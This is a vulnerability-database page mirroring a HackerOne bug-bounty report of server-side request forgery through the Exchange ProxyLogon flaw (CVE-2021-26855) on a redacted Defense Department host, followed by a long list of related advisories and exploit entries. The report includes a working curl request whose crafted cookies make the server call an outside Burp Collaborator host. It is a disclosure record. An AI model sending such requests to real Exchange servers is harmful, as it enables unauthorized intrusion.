Lucene search
SpongebhavH1:1119224HistoryMar 07, 2021 - 11:31 a.m.
U.S. Dept Of Defense: SSRF due to CVE-2021-26855 on ████████
2021-03-0711:31:33
spongebhav
hackerone.com
1589
0.975 High
EPSS
Percentile
100.0%
Description:There exists a Server Side Request Frogery (SSRF) on█████████** due toCVE-2021-26855
References
https://vulners.com/cve/CVE-2021-26855
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
Impact
Server Side Request Frogery
System Host(s)
██████
Affected Product(s) and Version(s)
CVE Numbers
CVE-2021-26855
Steps to Reproduce
curl -i -s -k -X $'GET' \
-H $'Host: ████' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:86.0) Gecko/20100101 Firefox/86.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
-b $'X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3' \
$'https://███/owa/auth/x.js'
Output:
█████████
Suggested Mitigation/Remediation Actions
Related
mssecure
mssecure
Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus
2021-03-18 22:00:47
Analyzing attacks taking advantage of the Exchange Server vulnerabilities
2021-03-25 21:21:07
Microsoft investigates Iranian attacks against the Albanian government
2022-09-08 15:00:00
metasploit
metasploit
Microsoft Exchange ProxyLogon Collector
2021-03-09 19:52:01
Microsoft Exchange ProxyLogon Scanner
2021-03-07 13:37:20
Microsoft Exchange ProxyLogon RCE
2021-03-12 23:49:45
githubexploit
githubexploit
Exploit for Server-Side Request Forgery in Microsoft
2021-03-17 03:32:19
Exploit for Server-Side Request Forgery in Microsoft
2021-03-11 20:51:48
Exploit for Server-Side Request Forgery in Microsoft
2021-03-06 09:15:55
thn
thn
CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws
2021-03-04 08:26:00
Chinese Cyber Espionage Targets Telecom Operators in Asia Since 2021
2024-06-20 10:22:00
saint
saint
Microsoft Exchange Server ProxyLogon vulnerability
2021-03-19 00:00:00
Microsoft Exchange Server ProxyLogon vulnerability
2021-03-19 00:00:00
Microsoft Exchange Server ProxyLogon vulnerability
2021-03-19 00:00:00
threatpost
threatpost
Mandiant Front Lines: How to Tackle Exchange Exploits
2021-04-16 14:02:54
Attackers Hijack Email Using Proxy Logon/Proxyshell Flaws
2021-11-22 19:26:25
IKEA Hit by Email Reply-Chain Cyberattack
2021-11-29 21:22:12
hivepro
hivepro
BackdoorDiplomacy targets the telecom industry in the Middle East
2022-12-08 07:20:51
Have you patched the vulnerabilities in Microsoft Exchange Server?
2021-08-18 11:01:05
AvosLocker Ransomware group has targeted 50+ Organizations Worldwide
2022-03-24 06:30:44
cve
cve
CVE-2021-26855
2021-03-03 00:15:12
malwarebytes
malwarebytes
Microsoft Exchange attacks cause panic as criminals go shell collecting
2021-03-09 19:59:37
Patch now! Exchange servers attacked by Hafnium zero-days
2021-03-03 12:34:27
securelist
securelist
Tomiris called, they want their Turla malware back
2023-04-24 08:00:22
IT threat evolution in Q2 2023
2023-08-30 10:00:05
Zero-day vulnerabilities in Microsoft Exchange Server
2021-03-04 17:20:57
cvelist
cvelist
CVE-2021-26855 Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 23:55:26
packetstorm
packetstorm
Microsoft Exchange Proxylogon SSRF Proof Of Concept
2021-03-11 00:00:00
Microsoft Exchange 2019 Unauthenticated Email Download
2021-05-18 00:00:00
Microsoft Exchange 2019 SSRF / Arbitrary File Write
2021-03-18 00:00:00
hackerone
hackerone
U.S. Dept Of Defense: CVE-2021-26855 on ████████ resulting in SSRF
2021-03-07 11:37:32
mmpc
mmpc
Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus
2021-03-18 22:00:47
Microsoft investigates Iranian attacks against the Albanian government
2022-09-08 15:00:00
Analyzing attacks taking advantage of the Exchange Server vulnerabilities
2021-03-25 21:21:07
talosblog
talosblog
What Talos Incident Response learned from a recent Qakbot attack hijacking old email threads
2022-07-27 12:00:00
Threat Advisory: HAFNIUM and Microsoft Exchange zero-day
2021-03-08 10:18:43
qualysblog
qualysblog
Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0
2022-06-22 21:23:51
Microsoft Exchange Server Zero-Days (ProxyLogon) – Automatically Discover, Prioritize and Remediate Using Qualys VMDR
2021-03-03 22:12:19
The Rise of Ransomware
2021-10-05 12:50:00
zdt
zdt
Microsoft Exchange 2019 - Unauthenticated Email Download Exploit
2021-05-18 00:00:00
Microsoft Exchange ProxyLogon Remote Code Execution Exploit
2021-03-23 00:00:00
Microsoft Exchange 2019 - Unauthenticated Email Download Exploit
2021-05-21 00:00:00
prion
prion
Remote code execution
2021-03-03 00:15:00
nvd
nvd
CVE-2021-26855
2021-03-03 00:15:12
cisa_kev
cisa_kev
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-11-03 00:00:00
nessus
nessus
Microsoft Exchange Server Authentication Bypass
2021-03-08 00:00:00
Security Updates for Microsoft Exchange Server (March 2021)
2021-03-03 00:00:00
exploitdb
exploitdb
Microsoft Exchange 2019 - Unauthenticated Email Download
2021-05-18 00:00:00
Microsoft Exchange 2019 - Unauthenticated Email Download (Metasploit)
2021-05-21 00:00:00
attackerkb
attackerkb
CVE-2021-27065
2021-03-03 00:00:00
CVE-2021-26855
2021-03-03 00:00:00
checkpoint_advisories
checkpoint_advisories
nuclei
nuclei
Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
2021-11-12 18:25:15
Exchange Server - Remote Code Execution
2021-08-10 07:59:06
Microsoft Exchange Server SSRF Vulnerability
2021-03-06 07:00:59
mskb
mskb
msrc
msrc
akamaiblog
akamaiblog
cisa
cisa
Microsoft Releases Out-of-Band Security Updates for Exchange Server
2021-03-02 00:00:00
impervablog
impervablog
ics
ics
fireeye
fireeye
krebs
krebs
Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails
2021-03-02 21:19:17
carbonblack
carbonblack
rapid7blog
rapid7blog
Indiscriminate Exploitation of Microsoft Exchange Servers (CVE-2021-24085)
2021-03-02 19:53:28
Rapid7’s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day
2021-03-03 00:41:04
Metasploit Wrap-Up
2021-03-26 17:36:13
kaspersky
kaspersky
KLA12103 ACE vulnerabilities in Microsoft Exchange Server
2021-03-02 00:00:00
wallarmlab
wallarmlab
avleonov
avleonov
Vulnerability Management news and publications #2
2022-08-14 11:30:44
Joint Advisory AA22-279A and Vulristics
2022-10-21 20:10:13
Vulristics: Microsoft Patch Tuesdays Q1 2021
2021-03-26 02:47:52
mscve
mscve
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 08:00:00
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 08:00:00
Microsoft Exchange Server Remote Code Execution Vulnerability
2021-03-02 08:00:00
googleprojectzero
googleprojectzero
The More You Know, The More You Know You Don’t Know
2022-04-19 00:00:00